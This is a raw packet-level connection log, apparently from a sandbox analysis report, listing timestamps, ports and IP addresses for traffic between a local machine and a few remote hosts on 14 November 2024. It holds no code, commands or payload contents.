                                                                                                                                                                                                            Nov 14, 2024 12:20:00.878940105 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.878951073 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.878962994 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.878973961 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.878983974 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.878993988 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879004955 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879050016 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879066944 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879077911 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879089117 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879103899 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879116058 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879125118 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879134893 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879149914 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879163027 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879173994 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879184961 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879194975 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879205942 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879221916 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879232883 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879244089 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879254103 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879265070 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879275084 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879285097 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879336119 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879344940 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879347086 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879347086 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879347086 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879347086 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879347086 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879347086 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879347086 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879355907 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879368067 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879380941 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879390001 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879390001 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879390001 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879390001 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879393101 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879390001 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879390001 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879390001 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879405022 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879416943 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879426956 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879426956 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879426956 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879426956 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879443884 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879453897 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879463911 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879478931 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879489899 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879499912 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879509926 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879520893 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879595041 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879595995 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879595041 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879595041 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879595041 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879595041 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879609108 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879621983 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879632950 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879638910 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879652023 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879662037 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879678965 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879690886 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879700899 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879740000 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879745960 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879750967 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879765034 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879766941 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879774094 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879785061 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879791975 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879801989 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879808903 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879822969 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879833937 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879838943 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879838943 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879839897 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879839897 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879843950 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879856110 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.879868031 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.881515026 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.881570101 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.881570101 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.938183069 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.938200951 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.938278913 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.938314915 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.938328028 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.939340115 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:01.578375101 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:02.701253891 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:10.254110098 CET4999380192.168.2.1078.47.21.153
                                                                                                                                                                                                            Nov 14, 2024 12:20:10.259028912 CET804999378.47.21.153192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:10.259123087 CET4999380192.168.2.1078.47.21.153
                                                                                                                                                                                                            Nov 14, 2024 12:20:10.259426117 CET4999380192.168.2.1078.47.21.153
                                                                                                                                                                                                            Nov 14, 2024 12:20:10.264375925 CET804999378.47.21.153192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:11.888104916 CET804999378.47.21.153192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:11.888128042 CET804999378.47.21.153192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:11.888243914 CET804999378.47.21.153192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:11.888281107 CET4999380192.168.2.1078.47.21.153
                                                                                                                                                                                                            Nov 14, 2024 12:20:11.888341904 CET4999380192.168.2.1078.47.21.153
                                                                                                                                                                                                            Nov 14, 2024 12:20:11.888415098 CET804999378.47.21.153192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:11.888478041 CET4999380192.168.2.1078.47.21.153
                                                                                                                                                                                                            Nov 14, 2024 12:20:11.888525009 CET804999378.47.21.153192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:11.888598919 CET4999380192.168.2.1078.47.21.153
                                                                                                                                                                                                            Nov 14, 2024 12:20:11.889975071 CET4999380192.168.2.1078.47.21.153
                                                                                                                                                                                                            Nov 14, 2024 12:20:11.890016079 CET4999380192.168.2.1078.47.21.153
                                                                                                                                                                                                            Nov 14, 2024 12:20:12.938081026 CET804999378.47.21.153192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:12.938180923 CET4999380192.168.2.1078.47.21.153
                                                                                                                                                                                                            Nov 14, 2024 12:20:14.588237047 CET49994443192.168.2.10172.67.19.24
                                                                                                                                                                                                            Nov 14, 2024 12:20:14.588278055 CET44349994172.67.19.24192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:14.589489937 CET49994443192.168.2.10172.67.19.24
                                                                                                                                                                                                            Nov 14, 2024 12:20:14.597460985 CET49994443192.168.2.10172.67.19.24
                                                                                                                                                                                                            Nov 14, 2024 12:20:14.597477913 CET44349994172.67.19.24192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:16.227457047 CET44349994172.67.19.24192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:16.227624893 CET49994443192.168.2.10172.67.19.24
                                                                                                                                                                                                            Nov 14, 2024 12:20:16.229362011 CET49994443192.168.2.10172.67.19.24
                                                                                                                                                                                                            Nov 14, 2024 12:20:16.229393005 CET44349994172.67.19.24192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:16.229665995 CET44349994172.67.19.24192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:16.274354935 CET49994443192.168.2.10172.67.19.24
                                                                                                                                                                                                            Nov 14, 2024 12:20:16.281485081 CET49994443192.168.2.10172.67.19.24
                                                                                                                                                                                                            Nov 14, 2024 12:20:16.323340893 CET44349994172.67.19.24192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:16.409743071 CET44349994172.67.19.24192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:16.409790039 CET44349994172.67.19.24192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:16.409821987 CET44349994172.67.19.24192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:16.409864902 CET44349994172.67.19.24192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:16.409861088 CET49994443192.168.2.10172.67.19.24
                                                                                                                                                                                                            Nov 14, 2024 12:20:16.409936905 CET44349994172.67.19.24192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:16.409974098 CET49994443192.168.2.10172.67.19.24
                                                                                                                                                                                                            Nov 14, 2024 12:20:16.410010099 CET44349994172.67.19.24192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:16.411583900 CET49994443192.168.2.10172.67.19.24
                                                                                                                                                                                                            Nov 14, 2024 12:20:16.419353008 CET49994443192.168.2.10172.67.19.24
                                                                                                                                                                                                            Nov 14, 2024 12:20:16.659249067 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:16.660080910 CET4999680192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:16.664141893 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:16.664217949 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:16.664849043 CET8049996147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:16.664913893 CET4999680192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:16.667352915 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:16.667352915 CET4999680192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:16.672336102 CET8049996147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:16.672346115 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.515544891 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.515585899 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.515603065 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.515614986 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.515625954 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.515636921 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.515647888 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.515654087 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.515671015 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.515707970 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.515722990 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.515737057 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.515748978 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.515784025 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.520448923 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.520514011 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.521471024 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.526747942 CET8049996147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.526762962 CET8049996147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.526772976 CET8049996147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.526783943 CET8049996147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.526793957 CET8049996147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.526803970 CET8049996147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.526815891 CET8049996147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.526824951 CET8049996147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.526837111 CET8049996147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.526846886 CET8049996147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.526870966 CET4999680192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.526922941 CET4999680192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.531915903 CET8049996147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.531928062 CET8049996147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.531938076 CET8049996147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.532042980 CET4999680192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.639462948 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.639481068 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.639513969 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.639524937 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.639538050 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.639554024 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.639595032 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.639847994 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.640027046 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.640038967 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.640050888 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.640074968 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.640106916 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.640383959 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.640434027 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.640445948 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.640455008 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.640470028 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.640485048 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.640516996 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.649977922 CET8049996147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.650064945 CET8049996147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.650150061 CET4999680192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.757221937 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.757256985 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.757273912 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.757289886 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.757306099 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.757318020 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.757334948 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.757349968 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.757365942 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.757383108 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.757406950 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.757433891 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.757482052 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.757498980 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.757514000 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.757538080 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.757823944 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.757837057 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.757896900 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.763983965 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.764036894 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.764065981 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.764080048 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.764087915 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.764182091 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.873768091 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.873796940 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.873819113 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.873857975 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.873975039 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.873996019 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.874016047 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.874034882 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.874048948 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.874053955 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.874077082 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.874119043 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.874475956 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.874495983 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.874516964 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.874562025 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.880954981 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.880990982 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.881025076 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.881027937 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.881088972 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.927232981 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.927280903 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.927355051 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.990678072 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.990726948 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.990736961 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.990823984 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.990878105 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.990890980 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.990904093 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.990956068 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.991203070 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.991384983 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.991439104 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.991446018 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.991451025 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.991461992 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.991472960 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.991523981 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.991601944 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.997807980 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.997818947 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.997961044 CET8049995147.45.47.81192.168.2.10
